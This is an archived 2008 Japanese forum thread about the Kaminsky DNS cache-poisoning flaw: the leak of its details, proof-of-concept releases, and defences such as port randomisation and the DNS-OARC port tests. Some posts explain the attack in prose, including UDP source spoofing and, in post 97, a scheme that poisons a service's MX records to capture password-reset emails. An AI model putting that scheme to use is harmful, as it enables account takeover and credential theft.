2ちゃんねる ■掲示板に戻る■ 全部 1- 最新50    

■ このスレッドは過去ログ倉庫に格納されています

DNSプロトコルの脆弱性情報 漏洩する

1 :名無しさん@お腹いっぱい。:2008/07/23(水) 23:13:15 .net
(前略)

今回の脆弱性についてはUS-CERTなどが7月上旬にアドバイザリーを公開。しかし、詳しい内容は伏せられており、
セキュリティ研究者のダン・カミンスキー氏が8月のBlackhatで発表する予定になっていた。

 ところが手違いで、詳細情報が一般に公開されてしまったという。攻撃者がこれを利用すれば、悪用コードを
作成してDNSキャッシュポイズニング攻撃を仕掛けることが可能になる。

 US-CERTのアドバイザリーでは、システムにこの脆弱性が存在するベンダーとしてCisco Systems、Debian
GNU/Linux、FreeBSD、富士通、Hewlett-Packard(HP)、IBM、Internet Systems Consortium(ISC)、Juniper Networks、
Microsoft、Novell、Red Hat、Sun Microsystems、SUSE Linux、Ubuntuなどを挙げている。

(以下略)

DNS脆弱性の詳報が手違いで流出
http://www.itmedia.co.jp/news/articles/0807/23/news031.html



DNS終了

2 :名無しさん@お腹いっぱい。:2008/07/23(水) 23:27:09 .net
記事を省くな

3 :名無しさん@お腹いっぱい。:2008/07/24(木) 08:00:44 .net
(略した部分を貼っておきますね)
 このうち、Microsoftは7月の月例パッチで問題を修正。ISC、Cisco、Debian、Red Hatなどもパッチやアドバイザリーを公開した。

 今回の詳細情報流出により、企業やISPが緊急に脆弱性の修正パッチを適用する必要性が一層高まったとSANSは指摘している。



4 :名無しさん@お腹いっぱい。:2008/07/24(木) 11:06:20 .net
たったそれだけw

5 :名無しさん@お腹いっぱい。:2008/07/24(木) 18:39:28 .net
http://qb5.2ch.net/test/read.cgi/operate/1212665493/895-

6 :名無しさん@お腹いっぱい。:2008/07/25(金) 09:00:09 .net
攻撃実証コードリリース
http://japan.zdnet.com/sp/feature/07zeroday/story/0,3800083088,20377716,00.htm


7 :名無しさん@お腹いっぱい。:2008/07/26(土) 01:30:04 .net
セキュ板なのにこのレス
いかに糞板なのか物語ってる

8 :名無しさん@お腹いっぱい。:2008/07/26(土) 13:06:04 .net


1)まずはDNS サーバからのクエリーのソースポートが
ランダムになっているか確かめましょう。

Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy
上記サイトで確かめます。
「POOR」の表示がひとつでもあったらアウト。
みんな「GREAT」なら大丈夫。



2)DNSサーバーを変えましょう。

もたもたしているといつ攻撃を食らうかわかったもんじゃないので、
とりあえず(比較的)安全なDNSに変えちゃいましょう。
おすすめは「OpenDNS」

安全で高速なDNSを提供する「OpenDNS」 - GIGAZINE
http://gigazine.net/index.php?/news/comments/20060720_opendns/

上記サイトを参考にDNSを変更しましょう。


こんな感じでいいのかな?
間違ってたら教えてちょ

9 :名無しさん@お腹いっぱい。:2008/07/26(土) 14:03:03 .net

3)インターネットの利用を中止する

もたもたしているといつ攻撃を食らうかわかったもんじゃないので
回線を引っこ抜いてそれを天井から吊り下げ首を引っ掛けちゃいましょう。

10 :名無しさん@お腹いっぱい。:2008/07/27(日) 00:11:56 .net
DNSシステム脆弱性問題、発見者がついに詳細情報を公開へ
http://namidame.2ch.net/test/read.cgi/news/1217084945/

DNSシステム脆弱性問題、発見者がついに詳細情報を公開へ

2008/07/26"
http://journal.mycom.co.jp/news/2008/07/26/013/index.html

11 :名無しさん@お腹いっぱい。:2008/07/27(日) 10:32:24 .net
手違いどころじゃないよ。脆弱性情報を学会の発表か何かと勘違いしているのな。
特にDNSなど、いかに素早く対応するか真価を問われているというのに、カンファレンスで
「発表」する予定だったと。

> この脆弱性情報は当初、IOActiveのダン・カミンスキー氏によって8月のBlackhat
> カンファレンスで発表される予定だったが、同氏の情報公開の遅さに業を煮やした人物が
> この脆弱性にかんする自らの見解を示しており、その情報を基に攻撃コードが作成されて
> いるとみられる。

> Julien Desfossezと名乗る人物がPythonで動作する攻撃コードを公開しており、
> 「動作は遅いがしっかり機能する」とコメントしている。

12 :名無しさん@お腹いっぱい。:2008/07/27(日) 12:18:10 .net
つーか脆弱性自体はずいぶん前に発見して、
半年たってようやく各社パッチの準備ができたので一斉に更新して、
テストや適用の期間を見越して詳細の公表を1ヶ月遅らようとしただけ

一部で実証コードが公開されたことで、
発見者があわてて詳細を大本営発表したのが手違いというか間違いってこと
第三者による独自解析と、発見者直々の詳細レポートでは影響力が全然違うからな

13 :名無しさん@お腹いっぱい。:2008/07/27(日) 13:10:56 .net
"大本営発表"とか、意味もわからずに言葉を使うなよ

以前からわかっていたものを、今年になってから騒ぎが大きくなったということ
問題はボンクラ管理者は腐るほどいるため、その警告と対策が末端まで行き渡らないってこと

水面下で対策を進めることはいいが、無駄に時間をかけることはこれを知っている悪意ある
人間の跳梁を許してしまい、逆にネット上で大問題になることが最大の周知と防御になる

14 :名無しさん@お腹いっぱい。:2008/07/27(日) 13:34:05 .net
221.113.139.145にtracertすると重複しますが、これでいいんですか?
---
 16    27 ms    26 ms    26 ms  125.170.96.54
 17    27 ms    27 ms    26 ms  210.163.253.2
 18    27 ms    27 ms    27 ms  60.37.14.2
 19    27 ms    28 ms    27 ms  nv-kf011.ocn.ad.jp [221.113.139.145]
 20    27 ms    28 ms    28 ms  nv-kf011.ocn.ad.jp [221.113.139.145]

15 :名無しさん@お腹いっぱい。:2008/07/27(日) 14:58:17 .net
インターネット終了のお知らせ。DNSの脆弱性の実証コードがリリースされる。僅か数分で汚染可能
http://namidame.2ch.net/test/read.cgi/news/1216952955/

16 :名無しさん@お腹いっぱい。:2008/07/27(日) 15:22:34 .net
これってDNSClientサービスをオフにしててもダメなん?

17 :名無しさん@お腹いっぱい。:2008/07/27(日) 15:30:26 .net
2ch.netなら、2ch.netのネームサーバがこの脆弱性にやられたら、
第三者の管理下にあるサーバを2ちゃんねる掲示板のように見せかけて運用することも可能…
と言ったようなお話。
サーバ運用者は可及的速やかに対応を…という件であって、一般ユーザはまあ。


18 :名無しさん@お腹いっぱい。:2008/07/28(月) 16:06:25 .net
つーかDNSのクライアントを限定すればいいやン

19 :名無しさん@お腹いっぱい。:2008/07/28(月) 17:31:11 .net
cache poisoningってそんな大問題?
大きなサーバならあれだけど
小さなサーバならキャッシュしなければいいだけジャン

20 :名無しさん@お腹いっぱい。:2008/07/28(月) 18:27:38 .net
セキュ板のレベル低下に絶望した

21 :名無しさん@お腹いっぱい。:2008/07/28(月) 21:45:01 .net
どう低下したか言ってくれなきゃダメよ

22 :名無しさん@お腹いっぱい。:2008/07/28(月) 23:09:45 .net
20じゃないけど低下を感じる部分を近くの書き込みで見ると

>これってDNSClientサービスをオフにしててもダメなん?

うん駄目
一つはプロバイダのDNSサーバが汚染されてたらクライアント止めても無駄と言う事実
もう一つはDNSクライアントを止めると確かにキャッシュはしなくなるが、肝心の名前解決の問い合わせを毎回外部に求めるようになる事が逆に危なくなると言う事
外部からの名前解決に答えない個人のPCの場合、キャッシュの生存時間が攻撃者には分からない為、攻撃するタイミングが分からない
でも毎回聞きに出ていたら、それに折り返した攻撃がし易くなる

つまりキャッシュをしない方が攻撃側には都合が良い事もある

>つーかDNSのクライアントを限定すればいいやン

問題はクライアントに依存しないし、クライアントが万全でもルータがタコだと攻撃可能になっている

なので、クライアントの種類に関わらず対策が必要になる
特にソフト的に何とかなる物よりも、ルータ等のハードの対応に手間取ると言われている

>小さなサーバならキャッシュしなければいいだけジャン

上で書いた通りキャッシュを無くすと攻撃にさらされるタイミングが増えてしまうし、小規模でもDNSサーバを公開している場合はキャッシュが存在しない事が相手にモロにばれる
攻撃者にしてみれば入れ食い状態なので、すごく楽

正解は、汚染されてない外部DNSサーバーから引いたキャッシュをしっかり保持し、その外部DNSサーバへの問い合わせポートを完全にランダムにして予想させない事
これだけで汚染される可能性は殆ど無くなる


大騒ぎする割にはやらなきゃならない事は二つしかない

対策済みと公表されるまでは汚染される可能性のあるDNSサーバで名前解決をしない
外部に名前解決を問い合わせるポートを固定にしない

23 :名無しさん@お腹いっぱい。:2008/07/28(月) 23:19:21 .net
サーバに手を入れられるなら
問い合わせのFQDNをランダムに大文字化することで
10〜20ビットほど稼げるらしいけど
ポートランダム化で稼げるのもせいぜい16ビットだし

24 :名無しさん@お腹いっぱい。:2008/07/28(月) 23:31:15 .net
まぁサーバを動かしてる個人の場合は既に大部分がポートのランダム化は終了してるはず
Windows系にしてもアップデートでランダム化は導入されたので、一番素人な層も最低限フォローされたはず

でも資金を投入しないと改善できないルータの部分が厳しい
ヤマハは即座に対応したけど、業務用途じゃない一般のブロードバンドルーターは一部のメーカーを除いてほったらかしと言うのが現状だからね
内部でどんなにランダム化されてても、ルータが全部同じポートに固定してたら全く意味が無くなる

それでも個人のルータなんて私怨でもなきゃ誰も攻撃しないからまだ安心
狙われたら危ないけど、そもそも狙われないだろうし

やっぱ怖いのはプロバイダのDNSが腐る事かな

25 :名無しさん@お腹いっぱい。:2008/07/28(月) 23:44:24 .net
ルータってプロバイダに取り次ぐだけでしょ?他から覗ける訳じゃないしプロバイダがちゃんとしてれば問題ないジャン

26 :名無しさん@お腹いっぱい。:2008/07/29(火) 00:32:46 .net
ファーミング詐欺始まったな

27 :名無しさん@お腹いっぱい。:2008/07/29(火) 01:56:13 .net
>>25
確かにルータは内部と外部をNATを通して取り次ぐだけだけど・・・
確認すれば分かる事だからはっきり書くけど、ルータは内向けのポートはどんなポートでも受け付けるけど、外向けの出口は綺麗に統一されて出て行く物が多いよ

今回の攻撃手法はPCやルータが外のDNSを見に行く時に攻撃する仕組みになっている
つまり、ルータの中が見えない事は攻撃側の難度を上げる事は出来るけど、外に聞きに行く時に嘘の情報を掴まされる事は防げない
ルータが正規のDNSサーバから名前解決を貰ったと思っていても、こっそり大嘘を掴まされてルータの内側のDNSクライアントのキャッシュが汚染される可能性がある

これをやられると外部のDNSサーバがどんなにセキュリティー万全でも防げない
防ぐ為にはルータから出て行く名前解決時のポートがランダムになっている必要がある

と言う訳で、ルータの中が覗けない事は攻撃者にとって攻撃に要する時間が長くなると言う効果しかない
同じポートさえ見張っていれば、いつかは目的のパケが出てくる可能性が高い訳だしね
狙われないだろうとは書いたけど、ちょっと竹島問題でも燃え上がれば日本人を絨毯爆撃する暇人が隣の大陸に大量に発生するかも知れない事を考えると、楽観は出来ない

「Googleにアクセスしたら新しいツールバーがダウンロード出来ると言うメッセージが表示され、OK押したら竹島の写真入りウイルスだった」

とか、すごくありそうじゃないか?
だからルータの出口がランダムかどうかは重要だよ

28 :名無しさん@お腹いっぱい。:2008/07/29(火) 02:10:32 .net
>>24
ヤマハは対応したのかな?
ファームを見に行ったけど、順次リリースってどういうこと?
リリースノートを見てもそれらしい修正は入っていないような気がするけど。
設定変更は載ってるね。

29 :名無しさん@お腹いっぱい。:2008/07/29(火) 02:27:21 .net
>>28
http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU800113.html
これの事だね

非公開β版テスターの情報によると、目下急ピッチで最終調整中らしいです
多分すぐロールアウトするんじゃないかな

30 :名無しさん@お腹いっぱい。:2008/07/29(火) 05:31:27 .net
forward onlyにしておけばいいのではないかな

31 :名無しさん@お腹いっぱい。:2008/07/29(火) 08:52:53 .net
>>30
forward only は自分のキャッシュの中に答えが無い場合は、fowardersに指定された外部のDNSに名前解決しに行くという意味
forward first との違いは効率と速度の問題だけなので、キャッシュに無い場合に最終的に外部に聞きに行く事には変わりが無いよ

キャッシュを探す→見つからないなら外部に聞きに行く→それでも見つからないならもう一度自分で探す→NXDOMAIN

only との差は、最終的な答えだけをキャッシュするか、それまでに得られた答えも全部キャッシュするか
後は first に「それでも見つからなければ・・・」の処理がある分だけ最終的な解決が遅くなる事
only はキャッシュと fowarders に答えが無い場合はすぐに諦める

両方とも外部DNSサーバーに聞きに出るのは同じなので、対策はしなけりゃならない
このオプションを書くと言うことはBINDだと思うんだけど、最新版でポートのランダム化は対策されてますよ
なので、後は外部DNSサーバーの確認とルータの確認だけだと思う
(DNSサーバーがタコの場合はOpenDNSがあるし、実質ルータだけですな)

32 :名無しさん@お腹いっぱい。:2008/07/29(火) 09:08:36 .net
>>31
>見つからないなら外部に聞きに行く
それここの説明と違うけど
tp://www.atmarkit.co.jp/flinux/rensai/bind915/bind915b.html

33 :名無しさん@お腹いっぱい。:2008/07/29(火) 09:11:58 .net
あいや同じか間違えてました
forwardersに対してだけであっても
自分の外に聞きに行くのは同じだから
この問題については違いはないと・・・・

34 :名無しさん@お腹いっぱい。:2008/07/29(火) 09:12:50 .net
あるNSに名前解決のUDPを飛ばす → そのNSが答えを返す
NSが答えを返す前に、嘘の答えを悪意者が返すってことですか?

その場合、悪意者のIPアドレスはNSのとは違うと思うのですが、返答してきた人のIPアドレスは
見ていないということですか?

35 :名無しさん@お腹いっぱい。:2008/07/29(火) 09:21:34 .net
>>34
そこがよく分からないよね
たしか前にinternicが乗っ取られたとき
ipアドレス確認するようにしたんじゃなかったの?
tp://www.hotfix.jp/archives/word/2005/word05-18.html

36 :名無しさん@お腹いっぱい。:2008/07/29(火) 12:21:55 .net
usen今だに対策してねー

37 :名無しさん@お腹いっぱい。:2008/07/29(火) 15:13:14 .net
ISPは対応してもルータのファームはそのままだよな。
抱き合わせでモデムルータ使ってるんだから対応汁。

38 :名無しさん@お腹いっぱい。:2008/07/29(火) 21:17:05 .net
>>34,35
UDPを使って一方方向の通信をするだけなので,
IPアドレスの詐称をすれば良いだけ。

39 :名無しさん@お腹いっぱい。:2008/07/29(火) 21:45:18 .net
>>38
頭良いな

40 :名無しさん@お腹いっぱい。:2008/07/29(火) 23:49:03 .net
>>36
実家のサーバのISPにお問い合わせしたら、1日で対応してくれた。
自宅アパートで使ってるISPはランダムだった。
会社の一番大手ISPは固定だったw

41 :名無しさん@お腹いっぱい。:2008/07/30(水) 08:03:31 .net
forward onlyにしておいて対策万全なforwardersとの間の通信をトンネル化しておけば問題なし

42 :名無しさん@お腹いっぱい。:2008/07/30(水) 09:33:06 .net
OPENDNS使えば安全?

43 :名無しさん@お腹いっぱい。:2008/07/30(水) 09:46:08 .net
>>41
トンネル使うって事は相手もトンネルに対応してなきゃならんわな
普通のプロバイダはそう言うサービス提供してないからなぁ
ちょっと普通のユーザーには縁のない話になるな

44 :名無しさん@お腹いっぱい。:2008/07/30(水) 12:55:29 .net
>>42
・プロバイダが攻撃されてDNSキャッシュが汚染される
・自分のPCが攻撃されてDNSキャッシュが汚染される

OpenDNSを使えば上の問題は解決するし、プロバイダが対策済みならOpenDNSを使うまでもない
でも下の問題は自分で何とかしなけりゃならない

OSのアップデート、DNSクライアントのアップデート、ルータのアップデートの三つが必要
前二つは探せば何とかなるが、ルータのメーカーが対策しないと無意味に近い

45 :名無しさん@お腹いっぱい。:2008/07/30(水) 13:14:56 .net
>・自分のPCが攻撃されてDNSキャッシュが汚染され
これって”インターネットプロトコル(TCP/IP)のプロパティ画面”で次のDNSサーバーのアドレスを使うに
見覚えのないDNSサーバーが追加されてるとかそういうケースか?
ttp://www.higaitaisaku.com/o17.html

46 :名無しさん@お腹いっぱい。:2008/07/30(水) 13:19:24 .net
>>45
違うー

47 :名無しさん@お腹いっぱい。:2008/07/30(水) 13:24:15 .net
で、なんで大騒ぎになってないのかな。
たいしたことではないってこと。

48 :名無しさん@お腹いっぱい。:2008/07/30(水) 13:25:16 .net
>>46
じゃあルータとかそういうの?

49 :名無しさん@お腹いっぱい。:2008/07/30(水) 13:29:50 .net
>>45
マルウェアに感染してそこいじられるってことはあるな

50 :名無しさん@お腹いっぱい。:2008/07/30(水) 14:07:36 .net
まあ実害はないかもしれないしな(攻撃を受けなかったり受けても問題なく過ごせたり)
けれど対策はしておかないとマズイだろう

51 :名無しさん@お腹いっぱい。:2008/07/30(水) 14:08:38 .net
>>48
PCがDNSに問い合わせた結果を一時保存しておくキャッシュがPC内のどこかにあるだろうがそれが汚染されるかもってこと

52 :774san:2008/07/30(水) 17:43:27 .net
外部のOpenResolverが対策済みか調べる方法ってどうすればいいの?
telnet出来るならdigで調べれるけど…。

53 :名無しさん@お腹いっぱい。:2008/07/30(水) 18:03:12 .net
DNS Client サービスを止めてもちゃんと名前解決するんだね。
ルータをつかっているからかな?

54 :名無しさん@お腹いっぱい。:2008/07/30(水) 18:10:36 .net
>>53
キャッシュがないから毎回読みに行ってるだけでしょ

55 :名無しさん@お腹いっぱい。:2008/07/30(水) 18:23:43 .net
>>38
IPアドレスって詐称できるんだ

56 :名無しさん@お腹いっぱい。:2008/07/30(水) 18:29:23 .net
詐称できるんだと思う人は詐称できません

57 :名無しさん@お腹いっぱい。:2008/07/30(水) 22:52:33 .net
>>51
DNSの解決速度を上げる為、殆どのOSではキャッシュはメモリ上だけになってる
だからシャットダウンや再起動でキャッシュはゼロになって最初から溜め直しになる

>>53
名前解決が必要になる度に外に聞きに行ってるから
手元の情報を使えない分速度も落ちるし、CPUのパワーも使うし、相手のDNSサーバに負担もかける
何よりDNSサーバが混雑し始めると、回線速度に関係なくブラウザの表示が遅くなったりする

攻撃者にしてみれば、外に聞きに出てくる度に毎回攻撃していれば、いつかは目当てのアクセスが通り過ぎるので攻撃が成功しやすくなる
キャッシュが有効な場合はデフォルトで一週間はキャッシュが残っているので、攻撃者には一週間に一度しか攻撃するチャンスがない
毎日シャットダウンするPCの場合は実質最初の一回しか攻撃するタイミングが無いことになる

プロバイダのDNSが汚染されている場合はキャッシュが有っても無くても同じと言う事を考えると
攻撃されるタイミングが増える上にパフォーマンスも落ちるのでキャッシュ無しはお勧めできない
逆にデフォルトよりキャッシュの生存時間を延ばしておけば、それだけ攻撃されるタイミングを減らす事も可能になる

>>52
プロバイダにメールで問い合わせるのが確実
まだ対策されてないなら「はよ対策せんかいドボケがっ!」と言う追い込みにもなる

58 :名無しさん@お腹いっぱい。:2008/07/30(水) 23:42:32 .net
        ___
      /      \
   /          \   セキュ板らしい流れになってきたお
  /   ⌒   ⌒   \
  |  /// (__人__) ///  | 
. (⌒)              (⌒)
./ i\            /i ヽ


59 :名無しさん@お腹いっぱい。:2008/07/31(木) 00:25:34 .net
でもそれだけ汚染状態が長く続くかも知れないけどな

60 :名無しさん@お腹いっぱい。:2008/07/31(木) 00:48:54 .net
学校のテストの問題でファーミング詐欺の説明しろって問題で
DNSを書き換えてURL偽装する
てな感じで書いたんだが間違ってるかね?
名前解決が〜とかいたほうがいいのか

61 :名無しさん@お腹いっぱい。:2008/07/31(木) 03:13:22 .net
>>60
詐欺が行われる事を説明する為に、以下のような文言が含まれている必要があるかも
順不同

・知名度の高いサイトを偽装する
知名度が低いサイトのURLを偽装しても詐欺という結果に繋がり難い
詐欺を結論させる為には知名度を利用した思考操作が必要

・一括的な方法で不特定多数を欺瞞情報に曝す
単一目標を攻撃する方法であるフィッシング詐欺と区別する部分は、不特定多数を対象にしている部分
ファーミング詐欺という名称を用いる際に必須の説明

・「DNS」ではなく「DNSサーバー」と書く方が正しい
DNSはDomainNameSystemの略
ファーミング詐欺ではシステムの書き換えは必須とされない

・DNSサーバーに一時集積されたドメインとIPアドレスの対応表を書き換える
DNSサーバーの情報を書き換えている行為に言及しつつ
情報という曖昧な表現ではなく、実際に何を書き換えているのかの説明が欲しい

・当事者が行う各種サーバーへのアクセスを不正に誘導する
当事者視点での現象の説明を行う
手法的にはダウンロードファイルのすり替え等も可能であるが、詐欺という説明の主流のみを説明する

・偽装されたサイトを利用して個人情報の奪取を目論む
ウイルス等に感染させる攻撃行為と詐欺行為とを分別する部分
ウイルス等を利用した複合的な手法もあり得るが、目的が攻撃であるか詐欺であるかで名称が変化する

62 :名無しさん@お腹いっぱい。:2008/07/31(木) 08:33:54 .net
そうだグーグルとかヤフーとか大手のところはTTLを無限大にしておけばイイヤ
それかゾーン転送してそれ使うとか

63 :名無しさん@お腹いっぱい。:2008/07/31(木) 12:08:11 .net
>>61
さんくす。
勉強不足だったお・・・

64 :名無しさん@お腹いっぱい。:2008/07/31(木) 12:47:39 .net
なんだか最近、物理的?には繋がってるんだけどDNSが変なのか
インターネットに繋がらないことが頻繁にあるんだけどこれってやばいのかな?

PeerGuardian2 のログにDNSの問い合わせがずらーっとでるよ

ちなみにISPはヤフーです

65 :名無しさん@お腹いっぱい。:2008/07/31(木) 12:53:37 .net
悪用コード公開の影響:DNSの脆弱性問題でISPに被害 - ITmedia News
http://www.itmedia.co.jp/news/articles/0807/31/news021.html

> DNSキャッシュポイズニングの脆弱性が見つかり悪用コードが出回っている
>問題で、実際にISPのサーバが攻撃され、トラフィックが偽サイトに誘導され
>る被害が発生した。

66 :名無しさん@お腹いっぱい。:2008/07/31(木) 13:14:33 .net
>>64 それはDNSのアドレス確認と、ルータのキャッシュがパンクしてるとか、脆弱性以外を疑ってみるがよろし。

67 :名無しさん@お腹いっぱい。:2008/07/31(木) 20:02:35 .net
>>64
おそらくOSがWindowsだと思うが、近頃行われたアップデートによりDNSクライアントの動作が変更になっている
今迄は問い合わせポートをあまり変更せず、その有効時間も短かったものを、ポートを頻繁に変更し、有効時間もかなり短くしている

これにより以下のようなトラブルが発生する事がある
当該ポートから送出されたUDPが先方に届き、先方からUDPパケが帰ってくるまでの間にポートの有効期間が過ぎてしまった場合、FW等では「無効なポートにアクセスしてくるUDP通信(とIP)」と判断され、パケットが破棄される
これはUDPパケットが基本的には送りっぱなしであり、セッションを維持しない通信の為、ポートは自身の有効期間が過ぎた場合にそのポートを利用するUDP通信を把握する事が出来ず、閉じてしまう事に起因する

原因としては、リモート側のサーバが混雑していてUDP送出が遅れたか、そもそもローカル側の処理が重く、ポート通過前の処理が遅延し、実際に通過するまでに相当の時間が経過している事が考えられる

68 :名無しさん@お腹いっぱい。:2008/07/31(木) 20:03:29 .net
× 今迄は問い合わせポートをあまり変更せず、その有効時間も短かったものを
○ 今迄は問い合わせポートをあまり変更せず、その有効時間も長かったものを

69 :名無しさん@お腹いっぱい。:2008/07/31(木) 21:06:47 .net
今回のMicrosoftのアップデート以降、CPUが100%になることが多くなった

70 :名無しさん@お腹いっぱい。:2008/07/31(木) 23:02:36 .net
ああ、Voice over DNSの人かぁ

\(^o^)/ DNSオワタ

71 :名無しさん@お腹いっぱい。:2008/07/31(木) 23:17:50 .net
AVG Anti-Virus Version 74
http://pc11.2ch.net/test/read.cgi/sec/1216429458/700

700 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/07/31(木) 23:08:14
これはマジやばいっす!

http://www.itmedia.co.jp/news/articles/0807/31/news021.html



被害でたーーーww

72 :名無しさん@お腹いっぱい。:2008/08/01(金) 20:37:27 .net
ツールが出てるから、後はツールを使える程度の知識があれば実行できるからなぁ
説明書に悪用するなって書いてあるし、実際の攻撃方法のうちいくつかの自動的手順か省かれてるけど、他のツールを使えば自動化が出来てる

つーか、今調べたらツールの制限を無くしたバージョンがクラックサイトに上がってるし、こりゃ本格侵攻されても仕方のない事態だね
大手が全部対応したら次は中規模企業と個人攻撃だろうし、やっぱ対策しておかないとまずいわな

73 :名無しさん@お腹いっぱい。:2008/08/01(金) 20:53:37 .net
Appleは対応しないことにしたみたいねw

74 :名無しさん@お腹いっぱい。:2008/08/01(金) 21:31:42 .net
>>73
今日アップデート出てた気がするけど?

75 :名無しさん@お腹いっぱい。:2008/08/01(金) 23:41:57 .net
Pantherは対象外ってオイオイ

76 :A:2008/08/02(土) 01:28:41 .net
で、どうやったらプロバの鯖が穴空いてるか調べるれるの?
鶴使って地道にアタック?

77 :名無しさん@お腹いっぱい。:2008/08/02(土) 02:35:44 .net
100も書き込みが無いんだから、このスレくらい読んだらどうだ。

78 :名無しさん@お腹いっぱい。:2008/08/02(土) 02:37:35 .net
>>76
コマンドライン使えない人なら
ttps://www.dns-oarc.net/oarc/services/dnsentropy
→ Test My DNS

コマンド使えるなら
ttps://www.dns-oarc.net/oarc/services/porttest

79 :名無しさん@お腹いっぱい。:2008/08/02(土) 08:27:31 .net
ランダムにしても、数分で汚染されるのが、数日〜一週間ぐらいに伸びるだけなんだよな
年単位に伸ばせれば十分な効果だが、一週間ぐらいじゃ小手先だけで根本的解決になっとらん。

80 :名無しさん@お腹いっぱい。:2008/08/02(土) 12:33:29 .net
上位互換でDNSパケットのエントロピーを128bitに増やすとか無理なんですかね。

81 :名無しさん@お腹いっぱい。:2008/08/02(土) 13:31:43 .net
エントロピーってなんじゃ?

82 :名無しさん@お腹いっぱい。:2008/08/02(土) 17:07:24 .net
無限大になったら宇宙が滅びるやつ

83 :A:2008/08/02(土) 19:13:16 .net
>78
サンクス。DTIだけど大丈夫だった。

84 :名無しさん@お腹いっぱい。:2008/08/02(土) 20:12:48 .net
>>83
何度か時間や日を変えて確認したほうがいいよ
いくつかあるDNSサーバのうち大丈夫だなやつに当たっただけって事もあるし

85 :名無しさん@お腹いっぱい。:2008/08/02(土) 20:32:21 .net
つーかサーバだけ確認したところで
ルータとかが間抜けなら意味ないがな

86 :名無しさん@お腹いっぱい。:2008/08/02(土) 20:38:29 .net
ルータの対応待ちだな。
RTX1000 2台とRT57i 1台。RT57iは後回しにされそうだ。

87 :名無しさん@お腹いっぱい。:2008/08/02(土) 22:13:42 .net
自分を確認したければBINDの場合はこんな感じ
ルータ越しならルータの対応も調べられる

dig +short porttest.dns-oarc.net TXT @127.0.0.1
dig +short porttest.dns-oarc.net TXT @192.168.XXX.XXX
@はプライベートの時だけ付けるので、プロバイダを調べる時には外す

これで調べられるのはforwardersに書かれた単一のDNSサーバーを利用した計測なので、利用するforwardersが増えるとセキュリティー度も向上する

88 :名無しさん@お腹いっぱい。:2008/08/03(日) 08:26:00 .net
100個以上のco.jpドメインのスレーブになってる、とあるサーバ(*.ipr*) がこの週末でやっと対応した。
どこからでも再帰検索させる、version.bindモロ見え(ど古い)、当然porttestはPOOR、と、すんごく不安だったのだ。
最初の点はそのままだけど後ろ2つに対応。

別件。OCNで(ダイアルアップ用のは対応済みって聞いたけど)自分の地域ではPPPoEで配ってくる
DNSのアドレスではPOORだったので、OpenDNSにしてみた。


89 :名無しさん@お腹いっぱい。:2008/08/05(火) 21:47:43 .net
自分はforwardersに20カ所のDNSサーバーを指定してるが、今回の件で未対応のサーバーを一時的にコメントアウトしてある
同時に信頼性と速度を計測して同時参照総数を30カ所に増やした

これだけ騒いでも未対応ってある意味すごいわ

90 :名無しさん@お腹いっぱい。:2008/08/06(水) 10:09:17 .net
DNS キャッシュポイズニングって
攻撃者のいるISPがソースアドレスを偽装した
IPパケットの送信を許可しているっていうこと?

そうでなけりゃ偽装した応答を
滑り込ませることはできないよね?

91 :名無しさん@お腹いっぱい。:2008/08/06(水) 15:27:25 .net
>>90
許可はしていないが偽装されているから通ってしまうと言う事
UDPはISPの能力や技術力とは関係無しに偽装されやすいパケなのでしゃーない

普通は良いルーターなら止まったりするんだが、市販のルーターより機能が遅れてるものが使われていると言うのが実情
何十万もする業務用ルーターがセキュ的にイマイチとなっても、山ほどあるから一度に交換できんし
そして本物と同じようにパケが出来ていたら、それはもう本物だから通すしかない
(中身に記録されている出所も外に記録されている出所も一致してたら、もうどこが発信地でも許可するしかない)
(ステートフルパケットインスペクションが有効でも、出て行ったパケの応答として作られたらアウト)

あと、攻撃者はISPの管理下に居る必要は無いよ
外にある管理外のDNSサーバーからのパケを偽装する訳だからそのDNSに近いと楽かもしれないけど

92 :名無しさん@お腹いっぱい。:2008/08/06(水) 20:44:17 .net
>>87
digはUNIX系じゃないとダメだから、一般人が調べるなら

nslookup -type=TXT porttest.dns-oarc.net 127.0.0.1
nslookup -type=TXT porttest.dns-oarc.net 192.168.xxx.xxx

デフォルトのDNS鯖を使うなら
nslookup -type=TXT porttest.dns-oarc.net

を推奨したほうがいいよ。ちなみにWinのnslookupは2秒でタイムアウトするから、何度か繰り返す必要あり。
そのうち返るようになる。

93 :名無しさん@お腹いっぱい。:2008/08/06(水) 21:13:42 .net
>>89
外部にフォワードしている時点で攻撃を受けることができるんですが

94 :名無しさん@お腹いっぱい。:2008/08/06(水) 22:27:08 .net
>>93
オプションプログラム入れて全30カ所の返答を照らし合わせて異例が無い物をキャッシュするようにしてある
だからフォワード先が多ければ多い程キャッシュポイズニングの危険性が減る
攻撃者がどんなに暇でも30カ所のDNSサーバーを同時に書き換えるのは無理だろうと言う作戦

一番最初の名前解決は激遅と言う難点があるし、異例を出しやすいDNSサーバーがフォワードに登録されていると動作が重くなるけど

95 :名無しさん@お腹いっぱい。:2008/08/07(木) 00:26:54 .net
>>92
ネットワーク設定のDNSを手動で変えて,
http://entropy.dns-oarc.net/test/
じゃダメなの?

96 :名無しさん@お腹いっぱい。:2008/08/07(木) 01:35:21 .net
>>95
時間がかかるけどそれでいいんでないかい?

コマンドプロンプト(nslookup)使う方は実際に使って無くてもチェックできるという利点があるのよ
だからちょっと気になった時にすぐ調べられる

97 :名無しさん@お腹いっぱい。:2008/08/07(木) 23:00:30 .net
DNS脆弱性問題、発見者が欠陥の詳細をついに公表――攻撃法も多数紹介
http://www.computerworld.jp/topics/vs/118209.html

プロバイダだけじゃなくて、Webサービス側のDNS鯖に欠陥があっても困るんだな
例えば、ターゲットのDNS鯖を攻撃し、大手ISPのMXレコードを自身の配下にあるIPアドレスだと覚えこませる

そして、パスワード忘れちゃったとID入力してWebサービス側にメールを送信させる
相手のSMTP鯖が勘違いして、自身の配下にメール送信。

送信先にSMTP鯖を起動しておいて、@の前がどんな文字列だろうと、受信するように設定しておけば、
メールからパスワード盗みたい放題w

98 :名無しさん@お腹いっぱい。:2008/08/07(木) 23:26:24 .net
ttp://customer.sphere.ne.jp/cgi-bin/mantis/view.cgi#mente
遅杉

99 :名無しさん@お腹いっぱい。:2008/08/09(土) 09:21:39 .net
管理外再帰の可能なDNSに限って言えば、国内の主要な所は更新されたようだね
大学も殆ど対応済み
CATVも殆ど対応済み

ただOCNの下にぶら下がる地方のプロバイダの更新が遅いね
